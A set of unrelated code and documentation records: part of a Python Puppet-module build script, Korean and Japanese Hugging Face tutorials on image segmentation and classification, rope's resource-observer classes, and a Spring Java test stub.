:param options: The command line options.
:type options: optparse.Options
"""
if not options.url:
# cloning not requested
return
shell('git clone --recursive %s' % options.url)
if not options.path:
path = os.path.basename(options.url)
options.path = path.split('.')[0]
def git_checkout(options):
"""
Perform a git checkout of a user specified branch or tag only if
the working-directory is a git repository. A git-fetch is done prior
to the checkout to ensure that branches and tags exist in the local repository.
Finally, unless a tag has been checked out, a git-pull is performed to ensure
the local repository is up to date with origin.
:param options: The command line options.
:type options: optparse.Options
"""
if not options.origin:
# not in a git repository
return
shell('git fetch')
shell('git fetch --tags')
if options.branch:
shell('git checkout %s' % options.branch)
shell('git pull')
return
if options.tag:
shell('git checkout %s' % options.tag)
return
def find_modules():
"""
Search for puppet (source) modules to build and return a list of paths.
Puppet modules are identified by finding '<module>/manifests/init.pp'
files. Once found, the *module* directory path is included in the result.
:return: A set of puppet module directory paths.
:rtype: set
"""
modules = set()
# Some old modules contain only 'Modulefile' metadata files, so find both. The set will remove duplicates.
modules_status, modules_output = shell('find . -name Modulefile -o -name metadata.json')
paths = modules_output.strip().split('\n')
for path in paths:
path = path.strip()
path_pieces = path.split('/')
# Puppet makes a PKG_DIR with a copy of the module when built, so don't include those
if len(path_pieces) >= 3 and path_pieces[-3] == PKG_DIR:
continue
modules.add(os.path.dirname(path))
return modules
def publish_module(module_dir, output_dir):
"""
Publish built puppet modules.
This mainly consists of copying the tarball from the pkg/
directory to the user specified output directory. The
output directory is created as needed.
:param module_dir: The module source directory path.
:type module_dir: str
:param output_dir: The user specified output directory path.
:type output_dir: str
"""
shell('mkdir -p %s' % output_dir)
for name in os.listdir(module_dir):
if not name.endswith(ARCHIVE_SUFFIX):
continue
path = os.path.join(module_dir, name)
shell('cp %s %s' % (path, output_dir))
def build_puppet_modules(options):
"""
Build puppet modules found during the search and publish
(copy) them to the user specified output directory.
:param options: The command line options.
:type options: optparse.Options
"""
for path in find_modules():
shell('puppet module build %s' % path)
pkg_dir = os.path.join(path, PKG_DIR)
publish_module(pkg_dir, options.output_dir)
def digest(path):
"""
Calculate the SHA256 hex digest for the file at the
specified path.
:param path: An absolute path to a file.
:type path: str
:return: The hex digest.
:rtype: str
"""
h = sha256()
with open(path) as fp:
h.update(fp.read())
return h.hexdigest()
def build_manifest(options):
"""
Build the pulp manifest.
The pulp manifest is a file listing the built puppet tarballs.
Each file is listed as an entry on a separate line and has the
format of: <name>,<sha256>,<size>.
:param options: The command line options.
:type options: optparse.Options
"""
_dir = os.getcwd()
chdir(options.output_dir)
with open('PULP_MANIFEST', 'w+') as fp:
for path in os.listdir('.'):
if not path.endswith(ARCHIVE_SUFFIX):
continue
fp.write(path)
fp.write(',%s' % digest(path))
fp.write(',%s\n' % os.path.getsize(path))
chdir(_dir)
def clean(options):
"""
Clean up before and after building when specified by the
user (-c|clean) command line option.
:param options: The command line options.
:type options: optparse.Options
"""
if options.url and options.clean:
path = os.path.join(options.working_dir, os.path.basename(options.url))
shell('rm -rf %s' % path)
def main():
"""
The command entry point.
"""
_dir = os.getcwd()
options = get_options()
clean(options)
chdir(options.working_dir)
git_clone(options)
chdir(options.path)
set_origin(options)
git_checkout(options)
build_puppet_modules(options)
build_manifest(options)
chdir(_dir)
clean(options) | unknown | codeparrot/codeparrot-clean | ||
<!--Copyright 2022 The HuggingFace Team. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with
the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
⚠️ Note that this file is in Markdown but contain specific syntax for our doc-builder (similar to MDX) that may not be
rendered properly in your Markdown viewer.
-->
# 의미적 분할(Semantic segmentation)[[semantic-segmentation]]
[[open-in-colab]]
<Youtube id="dKE8SIt9C-w"/>
의미적 분할(semantic segmentation)은 이미지의 각 픽셀에 레이블 또는 클래스를 할당합니다. 분할(segmentation)에는 여러 종류가 있으며, 의미적 분할의 경우 동일한 물체의 고유 인스턴스를 구분하지 않습니다. 두 물체 모두 동일한 레이블이 지정됩니다(예시로, "car-1" 과 "car-2" 대신 "car"로 지정합니다).
실생활에서 흔히 볼 수 있는 의미적 분할의 적용 사례로는 보행자와 중요한 교통 정보를 식별하는 자율 주행 자동차 학습, 의료 이미지의 세포와 이상 징후 식별, 그리고 위성 이미지의 환경 변화 모니터링등이 있습니다.
이번 가이드에서 배울 내용은 다음과 같습니다:
1. [SceneParse150](https://huggingface.co/datasets/scene_parse_150) 데이터 세트를 이용해 [SegFormer](https://huggingface.co/docs/transformers/main/en/model_doc/segformer#segformer) 미세 조정하기.
2. 미세 조정된 모델을 추론에 사용하기.
<Tip>
이 작업과 호환되는 모든 아키텍처와 체크포인트를 보려면 [작업 페이지](https://huggingface.co/tasks/image-segmentation)를 확인하는 것이 좋습니다.
</Tip>
시작하기 전에 필요한 모든 라이브러리가 설치되었는지 확인하세요:
```bash
pip install -q datasets transformers evaluate
```
커뮤니티에 모델을 업로드하고 공유할 수 있도록 Hugging Face 계정에 로그인하는 것을 권장합니다. 프롬프트가 나타나면 토큰을 입력하여 로그인하세요:
```py
>>> from huggingface_hub import notebook_login
>>> notebook_login()
```
## SceneParse150 데이터 세트 불러오기[[load-sceneparse150-dataset]]
🤗 Datasets 라이브러리에서 SceneParse150 데이터 세트의 더 작은 부분 집합을 가져오는 것으로 시작합니다. 이렇게 하면 데이터 세트 전체에 대한 훈련에 많은 시간을 할애하기 전에 실험을 통해 모든 것이 제대로 작동하는지 확인할 수 있습니다.
```py
>>> from datasets import load_dataset
>>> ds = load_dataset("scene_parse_150", split="train[:50]")
```
데이터 세트의 `train`을 [`~datasets.Dataset.train_test_split`] 메소드를 사용하여 훈련 및 테스트 세트로 분할하세요:
```py
>>> ds = ds.train_test_split(test_size=0.2)
>>> train_ds = ds["train"]
>>> test_ds = ds["test"]
```
그리고 예시를 살펴보세요:
```py
>>> train_ds[0]
{'image': <PIL.JpegImagePlugin.JpegImageFile image mode=RGB size=512x683 at 0x7F9B0C201F90>,
'annotation': <PIL.PngImagePlugin.PngImageFile image mode=L size=512x683 at 0x7F9B0C201DD0>,
'scene_category': 368}
```
- `image`: 장면의 PIL 이미지입니다.
- `annotation`: 분할 지도(segmentation map)의 PIL 이미지입니다. 모델의 타겟이기도 합니다.
- `scene_category`: "주방" 또는 "사무실"과 같이 이미지 장면을 설명하는 카테고리 ID입니다. 이 가이드에서는 둘 다 PIL 이미지인 `image`와 `annotation`만을 사용합니다.
나중에 모델을 설정할 때 유용하게 사용할 수 있도록 레이블 ID를 레이블 클래스에 매핑하는 사전도 만들고 싶을 것입니다. Hub에서 매핑을 다운로드하고 `id2label` 및 `label2id` 사전을 만드세요:
```py
>>> import json
>>> from pathlib import Path
>>> from huggingface_hub import hf_hub_download
>>> repo_id = "huggingface/label-files"
>>> filename = "ade20k-id2label.json"
>>> id2label = json.loads(Path(hf_hub_download(repo_id, filename, repo_type="dataset")).read_text())
>>> id2label = {int(k): v for k, v in id2label.items()}
>>> label2id = {v: k for k, v in id2label.items()}
>>> num_labels = len(id2label)
```
## 전처리하기[[preprocess]
다음 단계는 모델에 사용할 이미지와 주석을 준비하기 위해 SegFormer 이미지 프로세서를 불러오는 것입니다. 우리가 사용하는 데이터 세트와 같은 일부 데이터 세트는 배경 클래스로 제로 인덱스를 사용합니다. 하지만 배경 클래스는 150개의 클래스에 실제로는 포함되지 않기 때문에 `do_reduce_labels=True` 를 설정해 모든 레이블에서 배경 클래스를 제거해야 합니다. 제로 인덱스는 `255`로 대체되므로 SegFormer의 손실 함수에서 무시됩니다:
```py
>>> from transformers import AutoImageProcessor
>>> checkpoint = "nvidia/mit-b0"
>>> image_processor = AutoImageProcessor.from_pretrained(checkpoint, do_reduce_labels=True)
```
이미지 데이터 세트에 데이터 증강을 적용하여 과적합에 대해 모델을 보다 강건하게 만드는 것이 일반적입니다. 이 가이드에서는 [torchvision](https://pytorch.org/vision/stable/index.html)의 [`ColorJitter`](https://pytorch.org/vision/stable/generated/torchvision.transforms.ColorJitter.html)를 사용하여 이미지의 색상 속성을 임의로 변경합니다. 하지만, 자신이 원하는 이미지 라이브러리를 사용할 수도 있습니다.
```py
>>> from torchvision.transforms import ColorJitter
>>> jitter = ColorJitter(brightness=0.25, contrast=0.25, saturation=0.25, hue=0.1)
```
이제 모델에 사용할 이미지와 주석을 준비하기 위해 두 개의 전처리 함수를 만듭니다. 이 함수들은 이미지를 `pixel_values`로, 주석을 `labels`로 변환합니다. 훈련 세트의 경우 이미지 프로세서에 이미지를 제공하기 전에 `jitter`를 적용합니다. 테스트 세트의 경우 이미지 프로세서는 `images`를 자르고 정규화하며, 테스트 중에는 데이터 증강이 적용되지 않으므로 `labels`만 자릅니다.
```py
>>> def train_transforms(example_batch):
... images = [jitter(x) for x in example_batch["image"]]
... labels = [x for x in example_batch["annotation"]]
... inputs = image_processor(images, labels)
... return inputs
>>> def val_transforms(example_batch):
... images = [x for x in example_batch["image"]]
... labels = [x for x in example_batch["annotation"]]
... inputs = image_processor(images, labels)
... return inputs
```
모든 데이터 세트에 `jitter`를 적용하려면, 🤗 Datasets [`~datasets.Dataset.set_transform`] 함수를 사용하세요. 즉시 변환이 적용되기 때문에 더 빠르고 디스크 공간을 덜 차지합니다:
```py
>>> train_ds.set_transform(train_transforms)
>>> test_ds.set_transform(val_transforms)
```
## 평가하기[[evaluate]]
훈련 중에 메트릭을 포함하면 모델의 성능을 평가하는 데 도움이 되는 경우가 많습니다. 🤗 [Evaluate](https://huggingface.co/docs/evaluate/index) 라이브러리를 사용하여 평가 방법을 빠르게 로드할 수 있습니다. 이 태스크에서는 [mean Intersection over Union](https://huggingface.co/spaces/evaluate-metric/accuracy) (IoU) 메트릭을 로드하세요 (메트릭을 로드하고 계산하는 방법에 대해 자세히 알아보려면 🤗 Evaluate [quick tour](https://huggingface.co/docs/evaluate/a_quick_tour)를 살펴보세요).
```py
>>> import evaluate
>>> metric = evaluate.load("mean_iou")
```
그런 다음 메트릭을 [`~evaluate.EvaluationModule.compute`]하는 함수를 만듭니다. 예측을 먼저 로짓으로 변환한 다음, 레이블의 크기에 맞게 모양을 다시 지정해야 [`~evaluate.EvaluationModule.compute`]를 호출할 수 있습니다:
```py
>>> import numpy as np
>>> import torch
>>> from torch import nn
>>> def compute_metrics(eval_pred):
... with torch.no_grad():
... logits, labels = eval_pred
... logits_tensor = torch.from_numpy(logits)
... logits_tensor = nn.functional.interpolate(
... logits_tensor,
... size=labels.shape[-2:],
... mode="bilinear",
... align_corners=False,
... ).argmax(dim=1)
... pred_labels = logits_tensor.detach().cpu().numpy()
... metrics = metric.compute(
... predictions=pred_labels,
... references=labels,
... num_labels=num_labels,
... ignore_index=255,
... reduce_labels=False,
... )
... for key, value in metrics.items():
... if isinstance(value, np.ndarray):
... metrics[key] = value.tolist()
... return metrics
```
이제 `compute_metrics` 함수를 사용할 준비가 되었습니다. 트레이닝을 설정할 때 이 함수로 돌아가게 됩니다.
## 학습하기[[train]]
<Tip>
만약 [`Trainer`]를 사용해 모델을 미세 조정하는 것에 익숙하지 않다면, [여기](../training#finetune-with-trainer)에서 기본 튜토리얼을 살펴보세요!
</Tip>
이제 모델 학습을 시작할 준비가 되었습니다! [`AutoModelForSemanticSegmentation`]로 SegFormer를 불러오고, 모델에 레이블 ID와 레이블 클래스 간의 매핑을 전달합니다:
```py
>>> from transformers import AutoModelForSemanticSegmentation, TrainingArguments, Trainer
>>> model = AutoModelForSemanticSegmentation.from_pretrained(checkpoint, id2label=id2label, label2id=label2id)
```
이제 세 단계만 남았습니다:
1. 학습 하이퍼파라미터를 [`TrainingArguments`]에 정의합니다. `image` 열이 삭제되기 때문에 사용하지 않는 열을 제거하지 않는 것이 중요합니다. `image` 열이 없으면 `pixel_values`을 생성할 수 없습니다. 이런 경우를 방지하려면 `remove_unused_columns=False`로 설정하세요! 유일하게 필요한 다른 매개변수는 모델을 저장할 위치를 지정하는 `output_dir`입니다. `push_to_hub=True`를 설정하여 이 모델을 Hub에 푸시합니다(모델을 업로드하려면 Hugging Face에 로그인해야 합니다). 각 에포크가 끝날 때마다 [`Trainer`]가 IoU 메트릭을 평가하고 학습 체크포인트를 저장합니다.
2. 모델, 데이터 세트, 토크나이저, 데이터 콜레이터, `compute_metrics` 함수와 함께 학습 인자를 [`Trainer`]에 전달하세요.
3. 모델을 미세 조정하기 위해 [`~Trainer.train`]를 호출하세요.
```py
>>> training_args = TrainingArguments(
... output_dir="segformer-b0-scene-parse-150",
... learning_rate=6e-5,
... num_train_epochs=50,
... per_device_train_batch_size=2,
... per_device_eval_batch_size=2,
... save_total_limit=3,
... eval_strategy="steps",
... save_strategy="steps",
... save_steps=20,
... eval_steps=20,
... logging_steps=1,
... eval_accumulation_steps=5,
... remove_unused_columns=False,
... push_to_hub=True,
... )
>>> trainer = Trainer(
... model=model,
... args=training_args,
... train_dataset=train_ds,
... eval_dataset=test_ds,
... compute_metrics=compute_metrics,
... )
>>> trainer.train()
```
학습이 완료되면, 누구나 모델을 사용할 수 있도록 [`~transformers.Trainer.push_to_hub`] 메서드를 사용해 Hub에 모델을 공유하세요:
```py
>>> trainer.push_to_hub()
```
## 추론하기[[inference]]
이제 모델을 미세 조정했으니 추론에 사용할 수 있습니다!
추론할 이미지를 로드하세요:
```py
>>> image = ds[0]["image"]
>>> image
```
<div class="flex justify-center">
<img src="https://huggingface.co/datasets/huggingface/documentation-images/resolve/main/semantic-seg-image.png" alt="Image of bedroom"/>
</div>
추론을 위해 미세 조정한 모델을 시험해 보는 가장 간단한 방법은 [`pipeline`]에서 사용하는 것입니다. 모델을 사용하여 이미지 분할을 위한 `pipeline`을 인스턴스화하고 이미지를 전달합니다:
```py
>>> from transformers import pipeline
>>> segmenter = pipeline("image-segmentation", model="my_awesome_seg_model")
>>> segmenter(image)
[{'score': None,
'label': 'wall',
'mask': <PIL.Image.Image image mode=L size=640x427 at 0x7FD5B2062690>},
{'score': None,
'label': 'sky',
'mask': <PIL.Image.Image image mode=L size=640x427 at 0x7FD5B2062A50>},
{'score': None,
'label': 'floor',
'mask': <PIL.Image.Image image mode=L size=640x427 at 0x7FD5B2062B50>},
{'score': None,
'label': 'ceiling',
'mask': <PIL.Image.Image image mode=L size=640x427 at 0x7FD5B2062A10>},
{'score': None,
'label': 'bed ',
'mask': <PIL.Image.Image image mode=L size=640x427 at 0x7FD5B2062E90>},
{'score': None,
'label': 'windowpane',
'mask': <PIL.Image.Image image mode=L size=640x427 at 0x7FD5B2062390>},
{'score': None,
'label': 'cabinet',
'mask': <PIL.Image.Image image mode=L size=640x427 at 0x7FD5B2062550>},
{'score': None,
'label': 'chair',
'mask': <PIL.Image.Image image mode=L size=640x427 at 0x7FD5B2062D90>},
{'score': None,
'label': 'armchair',
'mask': <PIL.Image.Image image mode=L size=640x427 at 0x7FD5B2062E10>}]
```
원하는 경우 `pipeline`의 결과를 수동으로 복제할 수도 있습니다. 이미지 프로세서로 이미지를 처리하고 `pixel_values`을 GPU에 배치합니다:
```py
>>> device = torch.device("cuda" if torch.cuda.is_available() else "cpu") # 가능하다면 GPU를 사용하고, 그렇지 않다면 CPU를 사용하세요
>>> encoding = image_processor(image, return_tensors="pt")
>>> pixel_values = encoding.pixel_values.to(device)
```
모델에 입력을 전달하고 `logits`를 반환합니다:
```py
>>> outputs = model(pixel_values=pixel_values)
>>> logits = outputs.logits.cpu()
```
그런 다음 로짓의 크기를 원본 이미지 크기로 다시 조정합니다:
```py
>>> upsampled_logits = nn.functional.interpolate(
... logits,
... size=image.size[::-1],
... mode="bilinear",
... align_corners=False,
... )
>>> pred_seg = upsampled_logits.argmax(dim=1)[0]
```
결과를 시각화하려면 [dataset color palette](https://github.com/tensorflow/models/blob/3f1ca33afe3c1631b733ea7e40c294273b9e406d/research/deeplab/utils/get_dataset_colormap.py#L51)를 각 클래스를 RGB 값에 매핑하는 `ade_palette()`로 로드합니다. 그런 다음 이미지와 예측된 분할 지도(segmentation map)을 결합하여 구성할 수 있습니다:
```py
>>> import matplotlib.pyplot as plt
>>> import numpy as np
>>> color_seg = np.zeros((pred_seg.shape[0], pred_seg.shape[1], 3), dtype=np.uint8)
>>> palette = np.array(ade_palette())
>>> for label, color in enumerate(palette):
... color_seg[pred_seg == label, :] = color
>>> color_seg = color_seg[..., ::-1] # BGR로 변환
>>> img = np.array(image) * 0.5 + color_seg * 0.5 # 분할 지도으로 이미지 구성
>>> img = img.astype(np.uint8)
>>> plt.figure(figsize=(15, 10))
>>> plt.imshow(img)
>>> plt.show()
```
<div class="flex justify-center">
<img src="https://huggingface.co/datasets/huggingface/documentation-images/resolve/main/semantic-seg-preds.png" alt="Image of bedroom overlaid with segmentation map"/>
</div> | unknown | github | https://github.com/huggingface/transformers | docs/source/ko/tasks/semantic_segmentation.md |
import os
class ResourceObserver(object):
"""Provides the interface for observing resources
`ResourceObserver`\s can be registered using `Project.
add_observer()`. But most of the time `FilteredResourceObserver`
should be used. `ResourceObserver`\s report all changes passed
to them and they don't report changes to all resources. For
example if a folder is removed, it only calls `removed()` for that
folder and not its contents. You can use
`FilteredResourceObserver` if you are interested in changes only
to a list of resources. And you want changes to be reported on
individual resources.
"""
def __init__(self, changed=None, moved=None, created=None,
removed=None, validate=None):
self.changed = changed
self.moved = moved
self.created = created
self.removed = removed
self._validate = validate
def resource_changed(self, resource):
"""It is called when the resource changes"""
if self.changed is not None:
self.changed(resource)
def resource_moved(self, resource, new_resource):
"""It is called when a resource is moved"""
if self.moved is not None:
self.moved(resource, new_resource)
def resource_created(self, resource):
"""Is called when a new resource is created"""
if self.created is not None:
self.created(resource)
def resource_removed(self, resource):
"""Is called when a new resource is removed"""
if self.removed is not None:
self.removed(resource)
def validate(self, resource):
"""Validate the existence of this resource and its children.
This function is called when rope need to update its resource
cache about the files that might have been changed or removed
by other processes.
"""
if self._validate is not None:
self._validate(resource)
class FilteredResourceObserver(object):
"""A useful decorator for `ResourceObserver`
Most resource observers have a list of resources and are
interested only in changes to those files. This class satisfies
this need. It dispatches resource changed and removed messages.
It performs these tasks:
* Changes to files and folders are analyzed to check whether any
of the interesting resources are changed or not. If they are,
it reports these changes to `resource_observer` passed to the
constructor.
* When a resource is removed it checks whether any of the
interesting resources are contained in that folder and reports
them to `resource_observer`.
* When validating a folder it validates all of the interesting
files in that folder.
Since most resource observers are interested in a list of
resources that change over time, `add_resource` and
`remove_resource` might be useful.
"""
def __init__(self, resource_observer, initial_resources=None,
timekeeper=None):
self.observer = resource_observer
self.resources = {}
if timekeeper is not None:
self.timekeeper = timekeeper
else:
self.timekeeper = ChangeIndicator()
if initial_resources is not None:
for resource in initial_resources:
self.add_resource(resource)
def add_resource(self, resource):
"""Add a resource to the list of interesting resources"""
if resource.exists():
self.resources[resource] = self.timekeeper.get_indicator(resource)
else:
self.resources[resource] = None
def remove_resource(self, resource):
"""Add a resource to the list of interesting resources"""
if resource in self.resources:
del self.resources[resource]
def clear_resources(self):
"""Removes all registered resources"""
self.resources.clear()
def resource_changed(self, resource):
changes = _Changes()
self._update_changes_caused_by_changed(changes, resource)
self._perform_changes(changes)
def _update_changes_caused_by_changed(self, changes, changed):
if changed in self.resources:
changes.add_changed(changed)
if self._is_parent_changed(changed):
changes.add_changed(changed.parent)
def _update_changes_caused_by_moved(self, changes, resource,
new_resource=None):
if resource in self.resources:
changes.add_removed(resource, new_resource)
if new_resource in self.resources:
changes.add_created(new_resource)
if resource.is_folder():
for file in list(self.resources):
if resource.contains(file):
new_file = self._calculate_new_resource(
resource, new_resource, file)
changes.add_removed(file, new_file)
if self._is_parent_changed(resource):
changes.add_changed(resource.parent)
if new_resource is not None:
if self._is_parent_changed(new_resource):
changes.add_changed(new_resource.parent)
def _is_parent_changed(self, child):
return child.parent in self.resources
def resource_moved(self, resource, new_resource):
changes = _Changes()
self._update_changes_caused_by_moved(changes, resource, new_resource)
self._perform_changes(changes)
def resource_created(self, resource):
changes = _Changes()
self._update_changes_caused_by_created(changes, resource)
self._perform_changes(changes)
def _update_changes_caused_by_created(self, changes, resource):
if resource in self.resources:
changes.add_created(resource)
if self._is_parent_changed(resource):
changes.add_changed(resource.parent)
def resource_removed(self, resource):
changes = _Changes()
self._update_changes_caused_by_moved(changes, resource)
self._perform_changes(changes)
def _perform_changes(self, changes):
for resource in changes.changes:
self.observer.resource_changed(resource)
self.resources[resource] = self.timekeeper.get_indicator(resource)
for resource, new_resource in changes.moves.items():
self.resources[resource] = None
if new_resource is not None:
self.observer.resource_moved(resource, new_resource)
else:
self.observer.resource_removed(resource)
for resource in changes.creations:
self.observer.resource_created(resource)
self.resources[resource] = self.timekeeper.get_indicator(resource)
def validate(self, resource):
changes = _Changes()
for file in self._search_resource_moves(resource):
if file in self.resources:
self._update_changes_caused_by_moved(changes, file)
for file in self._search_resource_changes(resource):
if file in self.resources:
self._update_changes_caused_by_changed(changes, file)
for file in self._search_resource_creations(resource):
if file in self.resources:
changes.add_created(file)
self._perform_changes(changes)
def _search_resource_creations(self, resource):
creations = set()
if resource in self.resources and resource.exists() and \
self.resources[resource] is None:
creations.add(resource)
if resource.is_folder():
for file in self.resources:
if file.exists() and resource.contains(file) and \
self.resources[file] is None:
creations.add(file)
return creations
def _search_resource_moves(self, resource):
all_moved = set()
if resource in self.resources and not resource.exists():
all_moved.add(resource)
if resource.is_folder():
for file in self.resources:
if resource.contains(file):
if not file.exists():
all_moved.add(file)
moved = set(all_moved)
for folder in [file for file in all_moved if file.is_folder()]:
if folder in moved:
for file in list(moved):
if folder.contains(file):
moved.remove(file)
return moved
def _search_resource_changes(self, resource):
changed = set()
if resource in self.resources and self._is_changed(resource):
changed.add(resource)
if resource.is_folder():
for file in self.resources:
if file.exists() and resource.contains(file):
if self._is_changed(file):
changed.add(file)
return changed
def _is_changed(self, resource):
if self.resources[resource] is None:
return False
return self.resources[resource] != self.timekeeper.get_indicator(resource)
def _calculate_new_resource(self, main, new_main, resource):
if new_main is None:
return None
diff = resource.path[len(main.path):]
return resource.project.get_resource(new_main.path + diff)
class ChangeIndicator(object):
def get_indicator(self, resource):
"""Return the modification time and size of a `Resource`."""
path = resource.real_path
# on dos, mtime does not change for a folder when files are added
if os.name != 'posix' and os.path.isdir(path):
return (os.path.getmtime(path),
len(os.listdir(path)),
os.path.getsize(path))
return (os.path.getmtime(path),
os.path.getsize(path))
class _Changes(object):
def __init__(self):
self.changes = set()
self.creations = set()
self.moves = {}
def add_changed(self, resource):
self.changes.add(resource)
def add_removed(self, resource, new_resource=None):
self.moves[resource] = new_resource
def add_created(self, resource):
self.creations.add(resource) | unknown | codeparrot/codeparrot-clean | ||
/*
* Copyright 2002-present the original author or authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* https://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package example.scannable;
import org.springframework.stereotype.Repository;
/**
* @author Juergen Hoeller
*/
@Repository("myNamedDao")
public class NamedStubDao {
public String find(int id) {
return "bar";
}
} | java | github | https://github.com/spring-projects/spring-framework | spring-context/src/test/java/example/scannable/NamedStubDao.java |
<!--Copyright 2022 The HuggingFace Team. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with
the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
⚠️ Note that this file is in Markdown but contain specific syntax for our doc-builder (similar to MDX) that may not be
rendered properly in your Markdown viewer.
-->
# Image classification
[[open-in-colab]]
<Youtube id="tjAIM7BOYhw"/>
画像分類では、画像にラベルまたはクラスを割り当てます。テキストや音声の分類とは異なり、入力は
画像を構成するピクセル値。損傷の検出など、画像分類には多くの用途があります
自然災害の後、作物の健康状態を監視したり、病気の兆候がないか医療画像をスクリーニングしたりするのに役立ちます。
このガイドでは、次の方法を説明します。
1. [Food-101](https://huggingface.co/datasets/ethz/food101) データセットの [ViT](model_doc/vit) を微調整して、画像内の食品を分類します。
2. 微調整したモデルを推論に使用します。
<Tip>
このタスクと互換性のあるすべてのアーキテクチャとチェックポイントを確認するには、[タスクページ](https://huggingface.co/tasks/image-classification) を確認することをお勧めします。
</Tip>
始める前に、必要なライブラリがすべてインストールされていることを確認してください。
```bash
pip install transformers datasets evaluate
```
Hugging Face アカウントにログインして、モデルをアップロードしてコミュニティと共有することをお勧めします。プロンプトが表示されたら、トークンを入力してログインします。
```py
>>> from huggingface_hub import notebook_login
>>> notebook_login()
```
## Load Food-101 dataset
Datasets、🤗 データセット ライブラリから Food-101 データセットの小さいサブセットを読み込みます。これにより、次の機会が得られます
完全なデータセットのトレーニングにさらに時間を費やす前に、実験してすべてが機能することを確認してください。
```py
>>> from datasets import load_dataset
>>> food = load_dataset("ethz/food101", split="train[:5000]")
```
[`~datasets.Dataset.train_test_split`] メソッドを使用して、データセットの `train` 分割をトレイン セットとテスト セットに分割します。
```py
>>> food = food.train_test_split(test_size=0.2)
```
次に、例を見てみましょう。
```py
>>> food["train"][0]
{'image': <PIL.JpegImagePlugin.JpegImageFile image mode=RGB size=512x512 at 0x7F52AFC8AC50>,
'label': 79}
```
データセット内の各例には 2 つのフィールドがあります。
- `image`: 食品の PIL 画像
- `label`: 食品のラベルクラス
モデルがラベル ID からラベル名を取得しやすくするために、ラベル名をマップする辞書を作成します。
整数への変換、またはその逆:
```py
>>> labels = food["train"].features["label"].names
>>> label2id, id2label = dict(), dict()
>>> for i, label in enumerate(labels):
... label2id[label] = str(i)
... id2label[str(i)] = label
```
これで、ラベル ID をラベル名に変換できるようになりました。
```py
>>> id2label[str(79)]
'prime_rib'
```
## Preprocess
次のステップでは、ViT 画像プロセッサをロードして画像をテンソルに処理します。
```py
>>> from transformers import AutoImageProcessor
>>> checkpoint = "google/vit-base-patch16-224-in21k"
>>> image_processor = AutoImageProcessor.from_pretrained(checkpoint)
```
いくつかの画像変換を画像に適用して、モデルの過学習に対する堅牢性を高めます。ここでは torchvision の [`transforms`](https://pytorch.org/vision/stable/transforms.html) モジュールを使用しますが、任意の画像ライブラリを使用することもできます。
画像のランダムな部分をトリミングし、サイズを変更し、画像の平均と標準偏差で正規化します。
```py
>>> from torchvision.transforms import RandomResizedCrop, Compose, Normalize, ToTensor
>>> normalize = Normalize(mean=image_processor.image_mean, std=image_processor.image_std)
>>> size = (
... image_processor.size["shortest_edge"]
... if "shortest_edge" in image_processor.size
... else (image_processor.size["height"], image_processor.size["width"])
... )
>>> _transforms = Compose([RandomResizedCrop(size), ToTensor(), normalize])
```
次に、変換を適用し、画像の `pixel_values` (モデルへの入力) を返す前処理関数を作成します。
```py
>>> def transforms(examples):
... examples["pixel_values"] = [_transforms(img.convert("RGB")) for img in examples["image"]]
... del examples["image"]
... return examples
```
データセット全体に前処理関数を適用するには、🤗 Datasets [`~datasets.Dataset.with_transform`] メソッドを使用します。変換は、データセットの要素を読み込むときにオンザフライで適用されます。
```py
>>> food = food.with_transform(transforms)
```
次に、[`DefaultDataCollator`] を使用してサンプルのバッチを作成します。 🤗 Transformers の他のデータ照合器とは異なり、`DefaultDataCollator` はパディングなどの追加の前処理を適用しません。
```py
>>> from transformers import DefaultDataCollator
>>> data_collator = DefaultDataCollator()
```
## Evaluate
トレーニング中にメトリクスを含めると、多くの場合、モデルのパフォーマンスを評価するのに役立ちます。すぐにロードできます
🤗 [Evaluate](https://huggingface.co/docs/evaluate/index) ライブラリを使用した評価方法。このタスクでは、ロードします
[accuracy](https://huggingface.co/spaces/evaluate-metric/accuracy) 指標 (詳細については、🤗 評価 [クイック ツアー](https://huggingface.co/docs/evaluate/a_quick_tour) を参照してくださいメトリクスをロードして計算する方法):
```py
>>> import evaluate
>>> accuracy = evaluate.load("accuracy")
```
次に、予測とラベルを [`~evaluate.EvaluationModule.compute`] に渡して精度を計算する関数を作成します。
```py
>>> import numpy as np
>>> def compute_metrics(eval_pred):
... predictions, labels = eval_pred
... predictions = np.argmax(predictions, axis=1)
... return accuracy.compute(predictions=predictions, references=labels)
```
これで `compute_metrics`関数の準備が整いました。トレーニングを設定するときにこの関数に戻ります。
## Train
<Tip>
[`Trainer`] を使用したモデルの微調整に慣れていない場合は、[こちら](../training#train-with-pytorch-trainer) の基本的なチュートリアルをご覧ください。
</Tip>
これでモデルのトレーニングを開始する準備が整いました。 [`AutoModelForImageClassification`] を使用して ViT をロードします。ラベルの数と予想されるラベルの数、およびラベル マッピングを指定します。
```py
>>> from transformers import AutoModelForImageClassification, TrainingArguments, Trainer
>>> model = AutoModelForImageClassification.from_pretrained(
... checkpoint,
... num_labels=len(labels),
... id2label=id2label,
... label2id=label2id,
... )
```
この時点で残っているステップは 3 つだけです。
1. [`TrainingArguments`] でトレーニング ハイパーパラメータを定義します。 `image` 列が削除されるため、未使用の列を削除しないことが重要です。 `image` 列がないと、`pixel_values` を作成できません。この動作を防ぐには、`remove_unused_columns=False`を設定してください。他に必要なパラメータは、モデルの保存場所を指定する `output_dir` だけです。 `push_to_hub=True`を設定して、このモデルをハブにプッシュします (モデルをアップロードするには、Hugging Face にサインインする必要があります)。各エポックの終了時に、[`Trainer`] は精度を評価し、トレーニング チェックポイントを保存します。
